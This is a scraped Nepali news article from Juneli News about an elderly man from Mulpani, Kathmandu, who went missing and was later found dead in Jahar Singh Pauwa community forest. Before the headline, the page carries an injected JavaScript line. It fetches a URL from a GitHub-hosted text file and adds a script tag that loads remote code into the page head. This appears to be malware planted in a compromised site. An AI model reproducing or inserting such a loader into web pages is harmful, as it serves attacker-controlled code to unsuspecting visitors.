;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); काठमाडौँ कागेश्वरी मुलपानीबाट हराएका बृद्ध जर्सिंहपौवामा मृत फेला – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • काठमाडौँ कागेश्वरी मुलपानीबाट हराएका बृद्ध जर्सिंहपौवामा मृत फेला
Breaking News

काठमाडौँ कागेश्वरी मुलपानीबाट हराएका बृद्ध जर्सिंहपौवामा मृत फेला

जुनेली न्युज,

काठमाडौंको कागेश्वरी मनोहरा नगरपालिका वडा नम्बर ७ मुलपानीबाट हराएका एक बृद्ध शंखरापुर नगरपालिका जहरशिंह पौवा सामुदायिक वनमा मृत अवस्थामा भेटिएका छन् ।

मुलपानीको राधाकृष्ण मन्दिरनजिक आफ्नै निवासबाट गत चैत ६ गते दिउँसो निस्केका ७१ बर्षिय टंक प्रसाद शिवाकोटी आज मृत अवस्थामा फेला परेका हुन् ।

दोलखाको भिमेश्वर नगरपालिका वडा नम्बर ७ स्थायी घर भएका शिवाकोटी मोबाइल घरमै छोडेर निस्केका थिए । त्यसपछि उनि बेपत्ता भएका थिए ।

उनको शव जहरशिंह पौवा सामुदायिक वनको फेदीको जंगलमा भेटिएको हो ।

May be an image of 1 person and grass

 

फेसबुक प्रतिक्रियाहरु